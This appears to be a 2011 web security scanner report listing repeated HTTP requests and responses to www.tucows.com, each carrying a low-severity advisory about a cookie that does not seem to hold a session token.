HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:27:11 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 33526
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /author_ratings.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:27:07 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 34091
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /contact.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:27:06 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 33706
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Contact Us</title> < ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/contact.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:07 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/includes/corpbar/cb3.0/css/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:25:21 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/includes/js/aalib.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:25:27 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/includes/js/ajaxlib.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:25:28 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/includes/js/show_layer.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:25:25 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/includes/js/signupin.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:25:42 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/includes/js/x_core.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:25:30 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/includes/js/xdocsize.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:25:35 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/includes/js/yetii.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:25:25 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/includes/themes/03BlueMeany/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:25:20 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/includes/themes/03BlueMeany/styles.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:25:20 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/javascript:void(null) HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:39 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/lostpass.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:25:42 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
